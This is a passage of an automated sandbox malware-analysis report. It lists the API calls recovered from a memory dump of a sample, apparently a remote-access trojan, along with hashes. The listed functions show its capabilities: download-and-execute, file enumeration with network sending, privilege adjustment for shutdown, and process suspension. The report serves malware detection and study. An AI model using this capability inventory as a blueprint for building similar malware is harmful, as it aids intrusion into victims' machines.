                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                  • String ID:
                                                  • API String ID: 276877138-0
                                                  • Opcode ID: 6d0f589b7f4ed5c193fffaa70fef351a53496163331b96a9b3d3840ad54bf661
                                                  • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                  • Opcode Fuzzy Hash: 6d0f589b7f4ed5c193fffaa70fef351a53496163331b96a9b3d3840ad54bf661
                                                  • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                  APIs
                                                    • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                    • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                    • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                    • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                    • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                  • String ID: PowrProf.dll$SetSuspendState
                                                  • API String ID: 1589313981-1420736420
                                                  • Opcode ID: edc00706272dc8694fa210cddba580f6438878c4cc72cf4b9022d3c1a848817e
                                                  • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                  • Opcode Fuzzy Hash: edc00706272dc8694fa210cddba580f6438878c4cc72cf4b9022d3c1a848817e
                                                  • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                  • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                  • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                  • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                  • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                  APIs
                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                  • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                  • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                  • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID: SETTINGS
                                                  • API String ID: 3473537107-594951305
                                                  • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                  • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                  • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                  • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00407A91
                                                  • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 1157919129-0
                                                  • Opcode ID: 46eaf1de8721050399aceeeffa6b8ddb07bc60cda3e18ddf1bef56fed7617948
                                                  • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                  • Opcode Fuzzy Hash: 46eaf1de8721050399aceeeffa6b8ddb07bc60cda3e18ddf1bef56fed7617948
                                                  • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                  APIs
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                  • _free.LIBCMT ref: 00448067
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                  • _free.LIBCMT ref: 00448233
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                  • String ID:
                                                  • API String ID: 1286116820-0
                                                  • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                  • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                  • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                  • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DownloadExecuteFileShell
                                                  • String ID: C:\Users\user\Desktop\NssBkEQKsI.exe$open
                                                  • API String ID: 2825088817-185631247
                                                  • Opcode ID: 806f89e5d9568d09bc168edd225f3a527004a847cd52796411968059f3def9a9
                                                  • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                  • Opcode Fuzzy Hash: 806f89e5d9568d09bc168edd225f3a527004a847cd52796411968059f3def9a9
                                                  • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$FirstNextsend
                                                  • String ID: x@G$x@G
                                                  • API String ID: 4113138495-3390264752
                                                  • Opcode ID: 645ca9a1202d4aff518bc6bb2e592e768547bfcc40d5c4ff272d709c9adf3326
                                                  • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                  • Opcode Fuzzy Hash: 645ca9a1202d4aff518bc6bb2e592e768547bfcc40d5c4ff272d709c9adf3326
                                                  • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                    • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                    • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                    • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                  • API String ID: 4127273184-3576401099
                                                  • Opcode ID: 3d360fdf2e78990b0619b3c2804760803c56fcbcebbcac8b827f4f8c51bc1c9b
                                                  • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                  • Opcode Fuzzy Hash: 3d360fdf2e78990b0619b3c2804760803c56fcbcebbcac8b827f4f8c51bc1c9b
                                                  • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                  • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                  • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                  • String ID:
                                                  • API String ID: 4212172061-0
                                                  • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                  • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                  • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                  • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00408DAC
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$FirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 301083792-0
                                                  • Opcode ID: ddb70a6601a7304005fc3645352dd3df5e30722d72ad05399222f1dd23d63c6e
                                                  • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                  • Opcode Fuzzy Hash: ddb70a6601a7304005fc3645352dd3df5e30722d72ad05399222f1dd23d63c6e
                                                  • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                  • String ID:
                                                  • API String ID: 2829624132-0
                                                  • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                  • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                  • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                  • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A755
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A75F
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A76C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                  • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                  • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                  • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                  APIs
                                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                  • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                  • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                  • String ID:
                                                  • API String ID: 1815803762-0
                                                  • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                  • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                  • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                  • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 00442575
                                                  • TerminateProcess.KERNEL32(00000000,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044257C
                                                  • ExitProcess.KERNEL32 ref: 0044258E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                  • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                  • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                  • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACCC
                                                  • NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
                                                  • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACE2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpenSuspend
                                                  • String ID:
                                                  • API String ID: 1999457699-0
                                                  • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                  • Instruction ID: f0940f0a464cb9da12e036c8bcda16370f3965740af83b573a45ae51f9acba0f
                                                  • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
